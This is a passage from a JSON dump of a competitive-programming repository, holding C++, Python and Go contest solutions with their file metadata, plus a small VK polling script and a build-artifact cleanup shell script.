l : r;\n}\n//Igorjan\n//}}}\n\nstruct rational\n{\n int num, den;\n rational() : num(0), den(1) {}\n rational(int num, int den)\n {\n if (den == 0)\n this->den = 0,\n this->num = 1;\n else if (num == 0)\n this->den = 1,\n this->num = 0;\n else\n {\n int g = __gcd(abs(den), abs(num));\n den /= g;\n num /= g;\n if (den < 0)\n den *= -1,\n num *= -1;\n this->den = den;\n this->num = num;\n }\n }\n\n bool operator<(const rational& b) const {\n return num * 1ll * b.den < den * 1ll * b.num;\n }\n\n bool operator<=(const rational& b) const {\n return num * 1ll * b.den <= den * 1ll * b.num;\n }\n};\n\nostream& operator<<(ostream& os, const rational& rat)\n{\n return os << rat.num << \"/\" << rat.den;\n}\n\nvoid run()\n{\n int n;\n cin >> n;\n vector<pii> a(n), b;\n rational mn(MOD, 1), mx, zero;\n fori(n) cin >> a[i].first >> a[i].second;\n fori(n)\n FOR(j, i + 1, n)\n {\n int A = a[j].first - a[i].first;\n int B = a[i].second - a[j].second;\n if ((A == 0 && B > 0) || (B == 0 && A < 0))\n {\n cout << \"IMPOSSIBLE\\n\";\n return;\n }\n if (A == 0 || B == 0)\n continue;\n rational temp(B, A);\n if (A < 0)\n mn = min(mn, temp);\n else if (A > 0)\n mx = max(mx, temp);\n //cout << (i + 1) << \" \" << (j + 1) << \" \" << B << \" \" << A << \" \" << temp << \"\\n\";\n }\n if (mn <= mx || mn <= zero)\n cout << \"IMPOSSIBLE\\n\";\n else\n {\n for (int x = mx.num / mx.den + 1; x <= 10000; ++x)\n {\n int y = binSearch(1, MOD, [&](int m) {\n return x * 1ll * mn.den < m * 1ll * mn.num;\n });\n rational temp(x, y);\n if (mx < temp && temp < mn)\n {\n cout << x << \" \" << y << \"\\n\";\n return;\n }\n }\n cout << \"IMPOSSIBLE\\n\";\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n int t;\n cin >> t;\n fori(t)\n cout << \"Case #\" << (i + 1) << \": \",\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.40697672963142395, "alphanum_fraction": 0.42635658383369446, 
"avg_line_length": 17.39285659790039, "blob_id": "5691002bfdc617f4112bea9d5c5bbaecf918d60a", "content_id": "2183bcaeb4e8ad8b253de2c985fd903612e93f5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 516, "license_type": "no_license", "max_line_length": 47, "num_lines": 28, "path": "/2013/2013RCC3/message_nv.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdio>\n#include <string>\n\nusing namespace std;\n\nconst int MOD = 1e9 + 7;\n\nint main()\n{\n\tint n;\n\tcin >> n;\n\twhile (n--) {\n\t\tstring s;\n\t\tcin >> s;\n\t\tint k = s.size() / 2;\n\t\tlong long ans = 1, all = 1;\n\t\tfor (int i = 0; i < 2 * k; i++)\n\t\t\tall *= (s[i] == '?') + 1, all %= MOD;\n\t\tint i = 0;\n\t\twhile (i < k) {\n\t\t\tint cnt = (s[i] == '?') + (s[i + k] == '?');\n\t\t\tif (s[i] == s[i + k] && s[i] != '?') cnt++;\n\t\t\tans *= cnt, ans %= MOD, i++;\n\t\t}\n\t\tcout << (all - ans + MOD) % MOD << \"\\n\";\n\t}\n}\n\n" }, { "alpha_fraction": 0.5903614163398743, "alphanum_fraction": 0.6127366423606873, "avg_line_length": 22.239999771118164, "blob_id": "f8b3bb71d5bbaf8671b82ea536b8450ef6f2a65a", "content_id": "2ca12c9c8d14f239f6ac120d622354976c9e149b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 52, "num_lines": 25, "path": "/scripts/parserZaika.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import vk\nfn = '.zaika.date'\ndef writeFile(filename, date):\n with open(filename, 'w') as f:\n f.write(str(date))\n\ndef readFile(filename):\n try:\n with open(filename, 'r') as f:\n return int(f.readlines()[0])\n except:\n return 0\n\nlastDate = readFile(fn)\nnextDate = lastDate\nprint('CUR', lastDate)\nx = vk.vk('wall.get', count=10, owner_id=-186426881)\nfor item in list(x['items']):\n if item.date > lastDate:\n print(item.date)\n else:\n print('EXPIRED', 
item.date)\n nextDate = max(nextDate, item.date)\n\nwriteFile(fn, nextDate)\n" }, { "alpha_fraction": 0.35169491171836853, "alphanum_fraction": 0.3813559412956238, "avg_line_length": 17.153846740722656, "blob_id": "b37e0c65aeb36d76daec571802c4c2e479a61722", "content_id": "e91111331a493f3d6ebac7811878edacfe393dd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 236, "license_type": "no_license", "max_line_length": 40, "num_lines": 13, "path": "/CodeForce/gym/101090/H.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nk = int(input())\ns = input()\nn = len(s)\nfor i in range(n):\n if s[i] == '1':\n for j in range(i + k + 1, n, k):\n if s[j] == '1':\n print(i + 1, j + 1)\n sys.exit()\n\nprint(0, 0)\n" }, { "alpha_fraction": 0.4674759805202484, "alphanum_fraction": 0.4908497929573059, "avg_line_length": 26.05392074584961, "blob_id": "93151c6ef4f15451b19ce7d00eb09a199301d9ec", "content_id": "68a20c8f5461ade0f2e243e28445568e78fde465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5519, "license_type": "no_license", "max_line_length": 173, "num_lines": 204, "path": "/CodeForce/1769/D1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ntypedef bitset<37> state;\n\nmap<char, int> m = {\n {'6', 0},\n {'7', 1},\n {'8', 2},\n {'9', 3},\n {'T', 4},\n {'J', 5},\n {'Q', 6},\n {'K', 7},\n {'A', 8}\n};\nauto mm = \"6789TJQKA\";\nmap<char, int> z = {\n {'C', 0},\n {'D', 1},\n {'S', 2},\n {'H', 3},\n};\nauto zz = \"CDSH\";\n\nint get(const string& s)\n{\n return m[s[0]] + 9 * z[s[1]];\n}\n\nstring unwrap(int x)\n{\n int M = x % 9;\n int Z = x / 9;\n string s;\n s += mm[M];\n s += zz[Z];\n return s;\n}\n\nstate convert(const vector<string>& ss) {\n state cc;\n for (const string& s: ss)\n cc[get(s)] = true;\n return cc;\n};\n\nvector<string> unconvert(const state& cc) {\n vector<string> ss;\n fori(36)\n if (cc[i])\n ss.pb(unwrap(i));\n return ss;\n};\n\ntypedef array<state, 3> states;\n\nvector<states> go(const state& s, const state& cur, const state& other) {\n vector<states> ans;\n bool step = s[36];\n const auto& cards = step ? cur : other;\n for (int i = cards._Find_first(); i < SZ(cards); i = cards._Find_next(i))\n {\n int value = i % 9;\n if (value == 3 || (value < 3 && s[i + 1]) || (value > 3 && s[i - 1]))\n {\n auto ns = s;\n auto nc = cards;\n ns[i].flip();\n nc[i].flip();\n ns[36].flip();\n ans.pb({ns, step ? nc : cur, step ? 
other : nc});\n }\n }\n\n if (ans.size() == 0)\n {\n auto ns = s;\n ns[36].flip();\n ans.pb({ns, cur, other});\n }\n return ans;\n}\n\nvoid run()\n{\n vector<string> alice(18);\n vector<string> bob(18);\n readln(alice, bob);\n state a = convert(alice);\n state b = convert(bob);\n\n unordered_map<state, int> cache;\n\n states start = {state(), a, b};\n start[0][36] = true;\n\n auto dfs = [&](auto dfs, const states& s) -> int {\n auto it = cache.find(s[0]);\n if (it != cache.end())\n return it->second;\n\n auto f = [&]() -> int {\n bool step = s[0][36];\n //fori(3)\n //writeln(s[i].to_string());\n //writeln(); cout.flush();\n\n if (s[1].count() == 0)\n return s[2].count();\n if (s[2].count() == 0)\n return -int(s[1].count());\n auto nstates = go(s[0], s[1], s[2]);\n vector<int> pos;\n vector<int> neg;\n for (auto& ns: nstates)\n {\n auto ret = dfs(dfs, ns);\n if (ret > 0)\n pos.pb(ret);\n else\n neg.pb(ret);\n if ((step && ret > 0) || (!step && ret < 0))\n break;\n }\n sort(all(pos));\n sort(all(neg));\n if (step) //Alice\n {\n if (pos.size())\n return pos.back();\n return neg.back();\n }\n else\n {\n if (neg.size())\n return neg.back();\n return pos.back();\n }\n };\n return cache[s[0]] = f();\n };\n auto winner = dfs(dfs, start);\n if (winner > 0)\n writeln(\"Alice\");\n else\n writeln(\"Bob\");\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\" \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return 
os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4860302805900574, "alphanum_fraction": 0.49068683385849, "avg_line_length": 29.140350341796875, "blob_id": "581915b763a67c213415b08e0c74f2434928dd22", "content_id": "d8423439c5329d2444f917f887695fddf279b219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1718, "license_type": "no_license", "max_line_length": 96, "num_lines": 57, "path": "/2021/yandexBackendFinal/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "categories = {}\noffers = []\n\ninput()\n\ncategory = {}\nwhile True:\n s = input().strip()\n if s.startswith('-'):\n if 'id' in category:\n category['id'] = int(category['id'])\n categories[category['id']] = category\n category = {}\n s = s[2:]\n if s == 'offers:':\n category['id'] = int(category['id'])\n categories[category['id']] = category\n break\n s = s.split(':', 1)\n category[s[0]] = s[1].strip()\n\ntry:\n offer = {}\n while True:\n s = input().strip()\n if s.startswith('-'):\n if 'id' in offer:\n offer['price'] = int(offer['price'])\n categoryId = int(offer['categoryId'])\n del offer['categoryId']\n offer['id'] = int(offer['id'])\n category = categories[categoryId]\n if not 'minOffer' in category or category['minOffer']['price'] > offer['price']:\n categories[categoryId]['minOffer'] = offer\n if not 'maxOffer' in category or category['maxOffer']['price'] < offer['price']:\n categories[categoryId]['maxOffer'] = offer\n offer = {}\n s = s[2:]\n s = s.split(':', 1)\n offer[s[0]] = s[1].strip()\nexcept:\n pass\n\n\ndef printOffer(offer, title):\n print(f' {title}:')\n print(' id:', offer['id'])\n print(' name:', offer['name'])\n print(' 
description:', offer['description'])\n print(' price:', offer['price'])\n\nfor x in categories.values():\n if 'minOffer' in x:\n print('- id:', x['id'])\n print(' name:', x['name'])\n printOffer(x['minOffer'], 'minOffer')\n printOffer(x['maxOffer'], 'maxOffer')\n" }, { "alpha_fraction": 0.5426540374755859, "alphanum_fraction": 0.549763023853302, "avg_line_length": 37.3636360168457, "blob_id": "afdfe495a14bb4db4d43d0d6b37a7e762df75978", "content_id": "b2e02e3d47e7e88b48cccbb4f855d87256dea708", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 422, "license_type": "no_license", "max_line_length": 244, "num_lines": 11, "path": "/staff/cleaner.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "if [ $# -eq 1 ]\nthen a=$1\nfi\n\nif [ $# -eq 0 ]\nthen a=\"echo\"\nfi\n#find . -executable -type f ! -wholename './perl/*' ! -wholename './*pl' ! -wholename '*git*' ! -wholename './*.py' ! -wholename './*perl' ! -wholename './cleaner' ! -wholename './*.java' ! -wholename './*.sh' ! -wholename '*TDGame*' | xargs $a\nfind . -wholename './*.o' | xargs $a\nfind . -wholename './*.class' | xargs $a\nfind . 
-wholename './*~' | xargs $a\n" }, { "alpha_fraction": 0.460317462682724, "alphanum_fraction": 0.4682539701461792, "avg_line_length": 13.823529243469238, "blob_id": "4e7ae42ca0082410812ba1a1f92ad5a81c07779a", "content_id": "4d09c14b4654e93e5bd8baf282cf35d6599cf6aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 252, "license_type": "no_license", "max_line_length": 33, "num_lines": 17, "path": "/2017/newYear/M.go", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package main\n\nimport \"fmt\"\n\nfunc main() {\n\tvar s string\n\tfmt.Scan(&s)\n\tans := 0\n\tvar fix = map[byte]int{}\n\tfor i := range s {\n fix[s[i]] = fix[s[i]] + 1\n if (fix[s[i]] > ans) {\n ans = fix[s[i]]\n }\n\t}\n\tfmt.Println(ans)\n}\n" }, { "alpha_fraction": 0.49819493293762207, "alphanum_fraction": 0.521918535232544, "avg_line_length": 31.316667556762695, "blob_id": "5b6ead84552ee3bff02eaf76a52e536291ffb7a2", "content_id": "d176b006f140b3434045794ba1087e9d1c40c532", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3878, "license_type": "no_license", "max_line_length": 174, "num_lines": 120, "path": "/CodeForce/0159/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ntypedef pair<ll, int> q;\nvoid run()\n{\n ints(n);\n map<int, vector<pii>> m;\n fori(n)\n {\n ints(c, s);\n m[c].emplace_back(s, i + 1);\n }\n\n vector<vector<q>> mx(n + 1);\n for (auto& [c, v]: m)\n {\n sort(all(v));\n reverse(all(v));\n ll sum = 0;\n fori(v.size())\n {\n sum += v[i].first;\n mx[i + 1].emplace_back(sum, c);\n }\n }\n fori(n)\n sort(all(mx[i])),\n reverse(all(mx[i]));\n\n array<q, 3> ans;\n\n auto get = [&](const q& a, const q& b) {\n return a.first + b.first;\n };\n for (int i = n; i >= 0; --i)\n {\n forj1(mx[i].size())\n if (mx[i][j].second != mx[i][0].second)\n {\n auto temp = get(mx[i][0], mx[i][j]);\n if (temp > get(ans[0], ans[1]))\n ans = {mx[i][0], mx[i][j], {i, i}};\n }\n if (i >= 2 && mx[i].size() >= 1)\n forj(mx[i - 1].size())\n if (mx[i][0].second != mx[i - 1][j].second)\n {\n auto temp = get(mx[i][0], mx[i - 1][j]);\n if (temp > get(ans[0], ans[1]))\n ans = {mx[i][0], mx[i - 1][j], {i, i - 1}};\n }\n }\n writeln(get(ans[0], ans[1]));\n vector<int> vv;\n fori(ans[2].second)\n vv.pb(m[ans[0].second][i].second),\n vv.pb(m[ans[1].second][i].second);\n if (ans[2].first > ans[2].second)\n vv.pb(m[ans[0].second][ans[2].first - 1].second);\n \n writeln(vv.size());\n writeln(vv);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i 
ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5482895374298096, "alphanum_fraction": 0.5598185658454895, "avg_line_length": 25.06403923034668, "blob_id": "6e5c3542e0deaf383a45cccde292ffa4fed63f8c", "content_id": "95cb9acdc73982d1a98cd50b0facd916526cd947", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5291, "license_type": "no_license", "max_line_length": 139, "num_lines": 203, "path": "/2015/snws2/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//Igorjan94, template version from 11 January 2015\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define fst first\n#define snd second\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define eb emplace_back\n#define vs vector<string>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int>>\n#define pll pair<long long, long long>\n#define elohw(a) a.rbegin(), a.rend()\n#define whole(a) a.begin(), a.end()\n#define next _next\n#define prev _prev\n\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) 
(min_element(whole(a)) - (a).begin())\n#define wr(args...) err(split(#args,',').begin(),args)\n\n#define FILENAME \"input\"\n#define INF 1000000007\n\n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T &a);\nttti void priws(T a);\nttti void print(T a);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){priws(*f);for(auto i=++f;i!=s;++i)print(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n#define ints(args...) int args; readln(args)\n#define lll (args...) 
ll args; readln(args)\n#define FORI(n) for (unsigned i = 0; i < n; ++i)\n#define FORJ(n) for (unsigned j = 0; j < n; ++j)\n\ntemplate<class Type> Type powbin(Type a, int n);\n\ntemplate <typename T> class Matrix\n{\npublic:\n std::vector<std::vector<T> > a;\n unsigned n;\n unsigned m;\n\n Matrix(unsigned n, unsigned m, const T& initial);\n virtual ~Matrix();\n\n Matrix<T> operator^(int deg);\n Matrix<T> operator*(const Matrix<T>& rhs);\n Matrix<T>& operator*=(const Matrix<T>& rhs);\n std::vector<T>& operator[](int i);\n};\n\n\ntemplate<typename T>\nstd::vector<T>& Matrix<T>::operator[](int i)\n{\n return a[i];\n}\n\ntemplate<typename T>\nMatrix<T>::Matrix(unsigned n, unsigned m, const T& initial)\n{\n this->n = n;\n this->m = m;\n a.resize(n);\n FORI(n)\n a[i].resize(m, initial);\n}\n\ntemplate<typename T>\nMatrix<T>::~Matrix() {}\n\ntemplate<typename T>\nMatrix<T> Matrix<T>::operator*(const Matrix<T>& rhs)\n{\n unsigned nn = this->n;\n unsigned mm = rhs.m;\n Matrix result(nn, mm, (T) 0);\n FORI(nn)\n FORJ(mm)\n for (unsigned k = 0; k < this->m; k++)\n (result.a[i][j] += this->a[i][k] * rhs.a[k][j]) %= 6;\n return result;\n}\n\ntemplate<typename T>\nMatrix<T>& Matrix<T>::operator*=(const Matrix<T>& rhs)\n{\n Matrix result = (*this) * rhs;\n (*this) = result;\n return *this;\n}\n\ntemplate<typename T>\nMatrix<T> Matrix<T>::operator^(int i)\n{\n Matrix temp = *this;\n temp = powbin(temp, i);\n return temp;\n}\n\ntemplate<class Type>\nType powbin(Type a, int n)\n{\n Type result = a;\n --n;\n while (n)\n {\n if (n & 1)\n result *= a;\n a *= a;\n n >>= 1;\n }\n return result;\n}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nbool run()\n{ \n ints(n, m);\n if (n + m == 0)\n return false;\n Matrix<ll> A(n, m, 0);\n Matrix<ll> B(m, n, 0);\n readln(A.a, B.a);\n Matrix<ll> C = A * ((B * A) ^ (n * n - 1)) * B;\n ll ans = 0;\n fori(n)\n forj(n)\n ans += C[i][j];\n writeln(ans);\n 
return true;\n}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n while (run());\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){os<<a[0];for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.4366295337677002, "alphanum_fraction": 0.45438718795776367, "avg_line_length": 25.592592239379883, "blob_id": "819f6a76515346ee0bc945d787af9b8712d77afd", "content_id": "c442e55e3731e1d064bedc3a50c11d1fece768e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2872, "license_type": "no_license", "max_line_length": 107, "num_lines": 108, "path": "/2019/GCJ1C/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\n//Igorjan\n//}}}\n\nstring run()\n{\n int n;\n cin >> n;\n vector<string> a(n);\n fori(n)\n cin >> a[i];\n string ans;\n for (int i = 0; i < 500 * 500 && a.size(); ++i)\n {\n set<char> cur;\n for (auto& j : a)\n cur.insert(j[i % j.size()]);\n if (cur.size() == 3)\n return \"IMPOSSIBLE\";\n if (cur.size() == 1)\n {\n char c = *cur.begin();\n if (c == 'R')\n ans += 'P';\n else if (c == 'P')\n ans += 'S';\n else if (c == 'S')\n ans += 'R';\n return ans;\n }\n if (cur.size() == 2)\n {\n char c = *cur.begin();\n char d = *cur.rbegin();\n char b = '?';\n if (c > d) c = d;\n if (c == 'P' && d == 'R')\n b = 'P';\n else if (c == 'P' && d == 'S')\n b = 'S';\n else if (c == 'R' && d == 'S')\n b = 'R';\n ans += b;\n for (int j = SZ(a) - 1; j >= 0; --j)\n if (a[j][i % a[j].size()] != b)\n a.erase(a.begin() + j);\n }\n }\n if (a.size())\n return 
\"IMPOSSIBLE\";\n else\n return ans;\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n int t;\n cin >> t;\n fori(t)\n cout << \"Case #\" << (i + 1) << \": \" << run() << \"\\n\";\n#ifndef ONLINE_JUDGE\n //writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n" }, { "alpha_fraction": 0.4208776652812958, "alphanum_fraction": 0.4268617033958435, "avg_line_length": 21.787878036499023, "blob_id": "bc2cbd1f2409b5b75c2a7f06edb96304100cffe1", "content_id": "8f665d6ff57c08bf4012fae60a90bc474a97660f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1504, "license_type": "no_license", "max_line_length": 169, "num_lines": 66, "path": "/2020/back/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#define fori(n) for (int i = 0; i < int(n); ++i)\n#define forj(n) for (int j = 0; j < int(n); ++j)\n#define pb push_back\n\nusing namespace std;\n\nvector<string>split(string&s,const string&d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nint n, k, s, x;\n\nbool get(const vector<string>& a, const vector<string>& b)\n{\n bool qq = false;\n fori(s) {\n if (a[i] == \"\" || b[i] == \"\")\n continue;\n if (a[i] == b[i])\n qq = true;\n else\n return false;\n }\n if (!qq)\n return false;\n for (int i = s; i < k; ++i) {\n if (a[i] == \"\" || b[i] == \"\")\n continue;\n if (a[i] != b[i])\n return false;\n }\n return true;\n}\n\nint main()\n{\n cin >> n >> k >> s;\n vector<int> q;\n fori(s)\n {\n cin >> x;\n q.push_back(x - 1);\n }\n fori(k)\n if (find(q.begin(), q.end(), i) == q.end())\n q.push_back(i);\n vector<vector<string>> a(n);\n string t;\n getline(cin, t);\n fori(n)\n {\n string t;\n getline(cin, t);\n auto temp = split(t, 
